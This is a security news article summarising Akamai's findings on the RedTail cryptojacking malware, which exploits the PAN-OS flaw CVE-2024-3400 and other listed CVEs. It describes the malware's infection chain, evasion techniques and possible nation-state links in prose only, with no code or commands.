Alert: Palo Alto Networks Prey to RedTail Malware Exploits
In a recent development, threat actors behind the RedTail cryptojacking mining malware have expanded their arsenal by exploiting a newly disclosed IT infrastructure security flaw in Palo Alto Networks firewall exploit. This Palo Alto Networks security breach, affecting PAN-OS, has been quickly added to the RedTail malware toolkit, which now features enhanced anti-analysis techniques, as highlighted by Akamai’s web infrastructure and security team.
Exploitation of PAN-OS Vulnerability
According to security researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik from Akamai, the attackers have advanced their tactics by utilizing private crypto-mining pools. This move allows for greater control over mining outcomes despite higher operational and financial costs.
The RedTail malware exploit targets a patched PAN-OS vulnerability (CVE-2024-3400) with a CVSS score of 10.0, enabling unauthenticated attackers to execute arbitrary code with root privileges on the firewall.
RedTail Malware
Once the vulnerability is exploited, the RedTail malware runs commands to download and execute a bash script from an external domain, which subsequently downloads the RedTail payload tailored to the CPU architecture of the compromised system.
RedTail Detection and Removal
RedTail employs multiple propagation methods, exploiting known security flaws in various devices and software, including:
- TP-Link routers (CVE-2023-1389)
- ThinkPHP (CVE-2018-20062)
- Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887)
- VMWare Workspace ONE Access and Identity Manager (CVE-2022-22954)
First documented by security researcher Patryk Machowiak in January 2024, RedTail initially exploited the Log4Shell vulnerability (CVE-2021-44228) to infiltrate Unix-based systems. By March 2024, Barracuda Networks had reported that flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) were being used to install Mirai botnet variants and ThinkPHP vulnerabilities were leveraged to deploy RedTail.
Enhanced Evasion and Persistence Techniques
The latest version of RedTail, detected in April, introduces significant updates. The malware now includes an encrypted mining configuration used to launch the embedded XMRig miner. Notably, this version lacks a cryptocurrency wallet, suggesting a shift to private mining pools or proxies to maximize financial gains.
The configuration changes reflect the attackers’ efforts to optimize mining operations, showcasing a deep understanding of crypto-mining. The new variant employs advanced evasion and persistence techniques, such as forking itself multiple times to hinder debugging and killing any instances of GNU Debugger it detects. Akamai’s analysis reveals a high level of sophistication in RedTail, uncommon among typical cryptocurrency mining malware.
RedTail Malware Analysis
While the identity of the threat actors remains unclear, the use of private crypto-mining pools is reminiscent of tactics employed by the North Korea-linked Lazarus Group, known for executing extensive cyberattacks on network security devices for financial gain. Akamai researchers suggest that the complexity and resources required to operate a private mining pool indicate potential nation-state sponsorship.
“The investments necessary for a private crypto-mining operation include significant staffing, infrastructure, and obfuscation,” the researchers concluded, implying that RedTail’s sophistication points to a highly organized and possibly state-sponsored threat group. Regularly patching Palo Alto firewalls is essential for maintaining robust network security.
Conclusion
The ongoing evolution of the RedTail malware highlights the increasing sophistication of cyber threats targeting critical infrastructure. Organizations must remain vigilant and prioritize security updates to mitigate enterprise cybersecurity risks posed by these advanced supply chain cyberattacks. As threat actors continue to refine their tactics and expand their toolkits, the cybersecurity community must collaborate and innovate to stay ahead in this ever-changing landscape.
The sources for this piece include articles in The Hacker News and SC Media.